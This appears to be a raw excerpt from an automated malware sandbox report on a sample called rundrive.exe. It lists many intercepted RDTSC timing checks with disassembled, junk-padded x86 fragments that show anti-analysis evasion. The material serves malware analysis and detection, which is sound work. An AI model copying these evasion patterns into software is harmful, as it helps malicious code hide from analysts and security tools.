Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B0E14 second address: 5B0E39 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C026BAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C026C1h 0x00000013 jbe 00007FDA80C026B6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B1102 second address: 5B1107 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B4740 second address: 5B478C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FDA80C026C9h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 jg 00007FDA80C026B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FDA80C026BAh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B478C second address: 5B4791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B36DC second address: 5B36E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B49DF second address: 5B49F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 580215 second address: 58021B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD3DA second address: 5BD3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD3E9 second address: 5BD3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD541 second address: 5BD56C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e jmp 00007FDA80C00884h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD6DF second address: 5BD6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD6E9 second address: 5BD70C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDA80C00888h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD70C second address: 5BD734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jg 00007FDA80C026B6h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FDA80C026C2h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BD734 second address: 5BD754 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00876h 0x00000008 jmp 00007FDA80C00886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BDA56 second address: 5BDA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C3h 0x00000009 jmp 00007FDA80C026BFh 0x0000000e popad 0x0000000f jnc 00007FDA80C026C9h 0x00000015 jmp 00007FDA80C026BDh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BDA92 second address: 5BDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BDBD4 second address: 5BDBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BDD43 second address: 5BDD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE703 second address: 5BE70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE847 second address: 5BE84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE84B second address: 5BE84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE84F second address: 5BE855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE855 second address: 5BE86C instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C026BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE86C second address: 5BE870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE870 second address: 5BE876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE876 second address: 5BE87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BE994 second address: 5BE998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BEB42 second address: 5BEB68 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C00878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C00887h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5BF721 second address: 5BF725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 583716 second address: 583762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FDA80C00876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FDA80C00882h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FDA80C00889h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDA80C00881h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C1B7E second address: 5C1B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C1B82 second address: 5C1B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C2C10 second address: 5C2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C9h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jl 00007FDA80C026C7h 0x00000013 js 00007FDA80C026C1h 0x00000019 call 00007FDA80C026BAh 0x0000001e pop esi 0x0000001f push 00000000h 0x00000021 movsx esi, cx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FDA80C026B8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 adc si, A35Fh 0x00000045 xchg eax, ebx 0x00000046 push ebx 0x00000047 jns 00007FDA80C026B8h 0x0000004d pushad 0x0000004e popad 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FDA80C026BEh 0x00000058 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C3E1E second address: 5C3E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C48FE second address: 5C4902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C3E22 second address: 5C3E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C5BE7 second address: 5C5BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C4902 second address: 5C490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C3E28 second address: 5C3E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C5BF6 second address: 5C5BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C5BFA second address: 5C5C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDA80C026D0h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C5C20 second address: 5C5C2A instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C5C2A second address: 5C5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 57E759 second address: 57E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FDA80C00881h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C6277 second address: 5C627B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C6D13 second address: 5C6D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C7997 second address: 5C799C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C799C second address: 5C79A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C79A9 second address: 5C79B6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C79B6 second address: 5C79BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C817B second address: 5C8184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5CBDFB second address: 5CBE81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00884h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FDA80C00878h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1246A083h] 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+122D1E09h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FDA80C00878h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FDA80C0087Ch 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5CDF80 second address: 5CDFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007FDA80C026C6h 0x0000000e pop ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FDA80C026B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add dword ptr [ebp+1246A048h], ebx 0x00000031 push 00000000h 0x00000033 mov edi, 3D893900h 0x00000038 and ebx, 54301FCEh 0x0000003e xchg eax, esi 0x0000003f js 00007FDA80C026BAh 0x00000045 push edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 pop edx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FDA80C026BEh 0x00000051 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5CD13A second address: 5CD155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00887h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5CF168 second address: 5CF16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D0F5E second address: 5D0F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D0F64 second address: 5D0F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D0F6E second address: 5D0F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D2F64 second address: 5D2F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D6632 second address: 5D6636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D559E second address: 5D55A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D6636 second address: 5D663B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D76D3 second address: 5D76DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D663B second address: 5D6649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D76DD second address: 5D770A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FDA80C026C4h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D851D second address: 5D8530 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FDA80C0087Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D770A second address: 5D7710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D8530 second address: 5D8534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D7710 second address: 5D7714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D85D2 second address: 5D85D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D85D7 second address: 5D85DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DA4CA second address: 5DA4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DA4CE second address: 5DA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D95D8 second address: 5D95DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5D95DC second address: 5D95E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DB604 second address: 5DB608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DB608 second address: 5DB657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add ebx, 03308B9Eh 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 sbb edx, 21F48DABh 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FDA80C026B8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+122D38A8h] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DA778 second address: 5DA782 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DB7CA second address: 5DB7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5DB7CE second address: 5DB872 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, si 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or dword ptr [ebp+122D1AA8h], edx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FDA80C00878h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 cld 0x00000044 mov eax, dword ptr [ebp+122D0E5Dh] 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007FDA80C00878h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 add dword ptr [ebp+122D2126h], ebx 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007FDA80C00885h 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FDA80C00882h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E1576 second address: 5E1589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C026BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E800A second address: 5E8036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00885h 0x00000007 jmp 00007FDA80C00883h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E8036 second address: 5E8043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FDA80C026B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E8043 second address: 5E8049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
